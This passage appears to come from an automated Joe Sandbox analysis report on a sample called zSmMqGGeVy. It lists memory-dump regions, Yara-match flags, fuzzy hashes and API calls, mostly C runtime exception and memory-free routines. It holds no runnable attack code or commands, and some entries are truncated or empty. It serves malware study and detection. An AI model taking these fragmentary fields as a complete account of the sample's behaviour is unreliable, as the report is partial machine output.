                                                  • Instruction Fuzzy Hash: BDF13D71E002199BDF24CFA8C9806AEB7B1FF88314F25827AD819B7785D735AD05CB94
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                  • Instruction ID: fee4d84beb055a86dd425194947dffa6bc66b5034967b3f6f7c8bee7f6b031a7
                                                  • Opcode Fuzzy Hash: 49dfbd2288928feededa099d44ae440f86fb38599ad47adeb3a8dcc3b0116a46
                                                  • Instruction Fuzzy Hash: DDF11C71E002199FDF14CFA9D8806ADBBB1EF89314F25826AD919FB345D731AD41CB90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_819000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: :z+$|$Ot
                                                  • API String ID: 0-2459163665
                                                  • Opcode ID: 9cef5b81bc193cf4f3f4f46e5afb9ee7cbe487fa49bf4438ce9720c1b9ba1866
                                                  • Instruction ID: a8ab643a1cd48c15d82e4d06a412db950b175e5a2ca636370f5f39afaf702ac1
                                                  • Opcode Fuzzy Hash: 9cef5b81bc193cf4f3f4f46e5afb9ee7cbe487fa49bf4438ce9720c1b9ba1866
                                                  • Instruction Fuzzy Hash: B89138F3A092005BF7485D3DDC5473AB7D6EFD4320F1A863EE6C587788E93998068692
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.000000000099B000.00000040.00000001.01000000.00000003.sdmp, Offset: 0099B000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_99b000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: +q$Rg8
                                                  • API String ID: 0-1575899540
                                                  • Opcode ID: 19cd9d66efe0b31dc078b5234afed5dba3edb95c306ba298adcc2d3a95f4835a
                                                  • Instruction ID: 666c8b1966cf11a4530a9eabced907a790805ec975a51a6e805b633d32feb1fc
                                                  • Opcode Fuzzy Hash: 19cd9d66efe0b31dc078b5234afed5dba3edb95c306ba298adcc2d3a95f4835a
                                                  • Instruction Fuzzy Hash: 375112B390C624CBD3107A1CAC4467AB7F5EBA0320F264A3EDAD697340EA75085597C3
                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00413CE1,?,?,00000008,?,?,0041A8BE,00000000), ref: 00413F13
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  • Opcode ID: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                  • Instruction ID: d24852c949f4e96b46ec8ab4f7cfc98de9f7939d17e0a275251b5e9f75d92b01
                                                  • Opcode Fuzzy Hash: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                  • Instruction Fuzzy Hash: D0B13B31610609DFD715CF28C48ABA57BB0FF45365F258659E89ACF3A1C339EA82CB44
                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00EA3F48,?,?,00000008,?,?,00EAAB25,00000000), ref: 00EA417A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  • Opcode ID: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                  • Instruction ID: ab1aa51987462e900f35551a85635293f9a63b0c4db8f28102a62c8915077681
                                                  • Opcode Fuzzy Hash: 0b37e6520335243949131a18a83a17cc8901bab5f37b3ea18fa95d5cf57de7c4
                                                  • Instruction Fuzzy Hash: 44B16975610604CFD714CF28C486BA47BE0FF8A369F258658E99ADF2E1C375E982CB40
                                                  APIs
                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000E17F,?,?,00000008,?,?,1000DE14,00000000), ref: 1000E3B1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise
                                                  • String ID:
                                                  • API String ID: 3997070919-0
                                                  • Opcode ID: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                                  • Instruction ID: 1a3fbdf84673f95942c1f426381f735e0c8de5aa42652e790f36daf84cbc2009
                                                  • Opcode Fuzzy Hash: d9cad4c0d431712b17d678ca3744fd01f07566361e254315dc393335121516ed
                                                  • Instruction Fuzzy Hash: 9CB14A31610649CFE715CF28C486B997BE0FF453A4F258658E89ADF2A5C335EE82CB40
                                                  APIs
                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 004099C9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: FeaturePresentProcessor
                                                  • String ID:
                                                  • API String ID: 2325560087-0
                                                  • Opcode ID: 752c4a2c8d500711185399bf2f6f55f818018c6fd5b69fec1d7075e323bfd424
                                                  • Instruction ID: fa6e1b123792800c16e511e7ad2770c43bb66d79c6f5260c400c77222bdc654c
                                                  • Opcode Fuzzy Hash: 752c4a2c8d500711185399bf2f6f55f818018c6fd5b69fec1d7075e323bfd424
                                                  • Instruction Fuzzy Hash: 86517AB1A103158BDB24CF54D981BAABBF0FB88314F24853AC802EB395D378AD51CF59
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 553476085e68fa2a4c4149bcaaf72fd4b88f27a4c7c5ffc38eb151c09f90a700
                                                  • Instruction ID: 5ef8e782818ac5c356667e56c32e051b370d413b7f744af6f0ed5b3d29dfc074
                                                  • Opcode Fuzzy Hash: 553476085e68fa2a4c4149bcaaf72fd4b88f27a4c7c5ffc38eb151c09f90a700
                                                  • Instruction Fuzzy Hash: 5141B6B1C04618AFDB24DF69CC89AEABBB8EF85304F1442DEE41DD3211DA359E858F14
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 553476085e68fa2a4c4149bcaaf72fd4b88f27a4c7c5ffc38eb151c09f90a700
                                                  • Instruction ID: d6b96752b792aa5cf9aed6be5840f4cb2469570e986a64f76a925b998009f3e2
                                                  • Opcode Fuzzy Hash: 553476085e68fa2a4c4149bcaaf72fd4b88f27a4c7c5ffc38eb151c09f90a700
                                                  • Instruction Fuzzy Hash: 1E41C8B5D04218AEDF20DF78CC89AEABBB8AF4A304F1451DDE40DE7211DA319E848F10
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 30f242089dd6e22cc4e11ed5014ed8825358ef4a723b8267613fb38b8f4a68e2
                                                  • Instruction ID: 335cc09878d9dc9b483997cee4c12024a5fb43c2c5be13206e8e105b8fe94413
                                                  • Opcode Fuzzy Hash: 30f242089dd6e22cc4e11ed5014ed8825358ef4a723b8267613fb38b8f4a68e2
                                                  • Instruction Fuzzy Hash: 1B41B475C0425DAFEB10DF69CC89AEABBB9FF45240F1442D9E44DD3205DA359E848F10
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00009955,0040954F), ref: 0040994E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                                  • Instruction ID: 160f56f175047b98bcb04f76aad41df29ef0812fdf3d1f646e40cac976d24dbb
                                                  • Opcode Fuzzy Hash: 9652067fe804f50468db8aa7efa2e901f492ebb5d8cd0c1da14f72adc0e17d38
                                                  • Instruction Fuzzy Hash:
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(00409955,00E997B6), ref: 00E99BB5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                  • String ID: NTDL
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • String ID: 0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • String ID: 0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  • String ID: 0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  • String ID: 0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                  • String ID: ajn
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.000000000099B000.00000040.00000001.01000000.00000003.sdmp, Offset: 0099B000, based on PE: false
                                                  • String ID: 7\;W
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                  • String ID: uTJN
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                  • String ID: clk>
                                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                  • Instruction Fuzzy Hash: 1301D676A006048FDF21CF64C804BAA33F5FB8631AF8544B5D90AF7281E774A941CB90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597807409.0000000000A92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A92000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_a92000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fbc087d86986e6736eebb06f85375ab913284561c4857e37f255e00d3a5a12fe
                                                  • Instruction ID: b779d6ceb6c47a0d4c9e02bf746b339627fb539ba850f2e69f46cbf0e534b1b9
                                                  • Opcode Fuzzy Hash: fbc087d86986e6736eebb06f85375ab913284561c4857e37f255e00d3a5a12fe
                                                  • Instruction Fuzzy Hash: 12F02E7B3442012EDF108EA5AA65BFEB7B5E782720F34800AF004C1013D2800B151222
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                  • Instruction ID: fd5c11342e53f5fd9e78528a8d63764efe72d1229905d7d1658511e5362cd08d
                                                  • Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                  • Instruction Fuzzy Hash: EEE04632911228EBCB24DF898A08A8AF3ACEB44B09B11049AB501D3210C274DE80C7D4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                  • Instruction ID: 545d4294fb09cea3108a2138b1e80439c49707e38e75c3586403cb83c89e4ef3
                                                  • Opcode Fuzzy Hash: 938b1ef97d91fa147a56b9632c6ce73ee018995428c08987881a566186e623af
                                                  • Instruction Fuzzy Hash: 0CE08C72921228EBCB24DB98C905D8AF3FCEB4AB40F118096B901E7140C270EF00C7D0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                                  • Instruction ID: 49573a245b17cd2143a7f0a663dc82b9d5ba07e6c12e429f55ccbb336c262c76
                                                  • Opcode Fuzzy Hash: 225e9490ce15994035050fff8e8d94bbe50aeb352c3921d505d22bbc77bda227
                                                  • Instruction Fuzzy Hash: CEE08C32E11228EBCB10CB88C940E8AB3ECFB86A80F114096B505E3101D274DF00C7C2
                                                  APIs
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(0042AF64,00000FA0,?,?,00409066), ref: 00409094
                                                  • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409066), ref: 0040909F
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409066), ref: 004090B0
                                                  • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 004090C2
                                                  • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 004090D0
                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409066), ref: 004090F3
                                                  • RtlDeleteCriticalSection.NTDLL(0042AF64), ref: 0040910F
                                                  • CloseHandle.KERNEL32(00000000,?,?,00409066), ref: 0040911F
                                                  Strings
                                                  • SleepConditionVariableCS, xrefs: 004090BC
                                                  • kernel32.dll, xrefs: 004090AB
                                                  • api-ms-win-core-synch-l1-2-0.dll, xrefs: 0040909A
                                                  • WakeAllConditionVariable, xrefs: 004090C8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                  • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                  • API String ID: 2565136772-3242537097
                                                  • Opcode ID: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                                  • Instruction ID: acc3deda13f420712ce33b53dd37b90dad73ad81c8ab949137041f64949c0d3f
                                                  • Opcode Fuzzy Hash: f40741635cb42056a58b419ea30317dd48f67c6f9c1bd194eb93f888c376e813
                                                  • Instruction Fuzzy Hash: 410196B1F40322ABE7202B75AD0DB963B989B4CB01B154036FD15E2295D77CCC01866D
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 00417227
                                                    • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F00
                                                    • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F12
                                                    • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F24
                                                    • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F36
                                                    • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F48
                                                    • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F5A
                                                    • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F6C
                                                    • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F7E
                                                    • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416F90
                                                    • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FA2
                                                    • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FB4
                                                    • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FC6
                                                    • Part of subcall function 00416EE3: _free.LIBCMT ref: 00416FD8
                                                  • _free.LIBCMT ref: 0041721C
                                                    • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                    • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                  • _free.LIBCMT ref: 0041723E
                                                  • _free.LIBCMT ref: 00417253
                                                  • _free.LIBCMT ref: 0041725E
                                                  • _free.LIBCMT ref: 00417280
                                                  • _free.LIBCMT ref: 00417293
                                                  • _free.LIBCMT ref: 004172A1
                                                  • _free.LIBCMT ref: 004172AC
                                                  • _free.LIBCMT ref: 004172E4
                                                  • _free.LIBCMT ref: 004172EB
                                                  • _free.LIBCMT ref: 00417308
                                                  • _free.LIBCMT ref: 00417320
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: 78a1156ba884ffaad899c775ae10142786294d6101bc0a8744c53f5092b5fafb
                                                  • Instruction ID: edf7faae9d3bf0885fb7c5c7e3fb72ef0fb286978f56b7ec46c8a8d77fdb3eda
                                                  • Opcode Fuzzy Hash: 78a1156ba884ffaad899c775ae10142786294d6101bc0a8744c53f5092b5fafb
                                                  • Instruction Fuzzy Hash: A1313D31608204ABEB21AB7AD845BD777F4AF41354F24885BF559D7261EE38ECC1C628
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 00EA748E
                                                    • Part of subcall function 00EA714A: _free.LIBCMT ref: 00EA7167
                                                    • Part of subcall function 00EA714A: _free.LIBCMT ref: 00EA7179
                                                    • Part of subcall function 00EA714A: _free.LIBCMT ref: 00EA718B
                                                    • Part of subcall function 00EA714A: _free.LIBCMT ref: 00EA719D
                                                    • Part of subcall function 00EA714A: _free.LIBCMT ref: 00EA71AF
                                                    • Part of subcall function 00EA714A: _free.LIBCMT ref: 00EA71C1
                                                    • Part of subcall function 00EA714A: _free.LIBCMT ref: 00EA71D3
                                                    • Part of subcall function 00EA714A: _free.LIBCMT ref: 00EA71E5
                                                    • Part of subcall function 00EA714A: _free.LIBCMT ref: 00EA71F7
                                                    • Part of subcall function 00EA714A: _free.LIBCMT ref: 00EA7209
                                                    • Part of subcall function 00EA714A: _free.LIBCMT ref: 00EA721B
                                                    • Part of subcall function 00EA714A: _free.LIBCMT ref: 00EA722D
                                                    • Part of subcall function 00EA714A: _free.LIBCMT ref: 00EA723F
                                                  • _free.LIBCMT ref: 00EA7483
                                                    • Part of subcall function 00EA1D29: HeapFree.KERNEL32(00000000,00000000,?,00EA72DB,?,00000000,?,?,?,00EA7302,?,00000007,?,?,00EA75E1,?), ref: 00EA1D3F
                                                    • Part of subcall function 00EA1D29: GetLastError.KERNEL32(?,?,00EA72DB,?,00000000,?,?,?,00EA7302,?,00000007,?,?,00EA75E1,?,?), ref: 00EA1D51
                                                  • _free.LIBCMT ref: 00EA74A5
                                                  • _free.LIBCMT ref: 00EA74BA
                                                  • _free.LIBCMT ref: 00EA74C5
                                                  • _free.LIBCMT ref: 00EA74E7
                                                  • _free.LIBCMT ref: 00EA74FA
                                                  • _free.LIBCMT ref: 00EA7508
                                                  • _free.LIBCMT ref: 00EA7513
                                                  • _free.LIBCMT ref: 00EA754B
                                                  • _free.LIBCMT ref: 00EA7552
                                                  • _free.LIBCMT ref: 00EA756F
                                                  • _free.LIBCMT ref: 00EA7587
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2598599744.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_e90000_zSmMqGGeVy.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
                                                  • Instruction ID: 09b6f213e50c82812be019502d49872f3c575876eaf3757ad1e1bd588172dc38
                                                  • Opcode Fuzzy Hash: 618733a9981a7d7e15cd004ff7cd88c67c18ad7243d380dd4353b554986c4def
                                                  • Instruction Fuzzy Hash: E8319032A082059FDB25AA38DC05B5677E9EF0E315F116869F4A8FF191DB34FC808721
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 1000A045
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C43D
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C44F
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C461
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C473
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C485
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C497
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4A9
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4BB
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4CD
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4DF
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C4F1
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C503
                                                    • Part of subcall function 1000C420: _free.LIBCMT ref: 1000C515
                                                  • _free.LIBCMT ref: 1000A03A
                                                    • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                    • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                  • _free.LIBCMT ref: 1000A05C
                                                  • _free.LIBCMT ref: 1000A071
                                                  • _free.LIBCMT ref: 1000A07C
                                                  • _free.LIBCMT ref: 1000A09E
                                                  • _free.LIBCMT ref: 1000A0B1
                                                  • _free.LIBCMT ref: 1000A0BF
                                                  • _free.LIBCMT ref: 1000A0CA
                                                  • _free.LIBCMT ref: 1000A102
                                                  • _free.LIBCMT ref: 1000A109
                                                  • _free.LIBCMT ref: 1000A126
                                                  • _free.LIBCMT ref: 1000A13E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2601165316.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2601143470.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601190709.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2601211952.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
                                                  • Instruction ID: 0af802e5104cca544d2385e0ca1ca05a391064d886f9d3a5cb5d526743884836
                                                  • Opcode Fuzzy Hash: 4f6d344103cf7811bd09b71d21c977f492913705ec11a3a18dac91d66e09e7eb
                                                  • Instruction Fuzzy Hash: 24315B31A002059BFB20DA34DC41B8A77E9FB423E0F114519F449E719ADE79FE908761
                                                  APIs
                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 0040B1D8
                                                  • type_info::operator==.LIBVCRUNTIME ref: 0040B1FA
                                                  • ___TypeMatch.LIBVCRUNTIME ref: 0040B309
                                                  • IsInExceptionSpec.LIBVCRUNTIME ref: 0040B3DB
                                                  • _UnwindNestedFrames.LIBCMT ref: 0040B45F
                                                  • CallUnexpected.LIBVCRUNTIME ref: 0040B47A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2597509559.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2597509559.000000000042A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_zSmMqGGeVy.jbxd
                                                  Similarity
                                                  • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 2123188842-393685449
                                                  • Opcode ID: 5cc99db94015cab6c404d32d320387b6f9b26d2efedfbed277260f256f17e541
                                                  • Instruction ID: 3d06a1d46c9e927f581abf88e740a03f69e3fad8364d4cdf02b7d05f470413ac
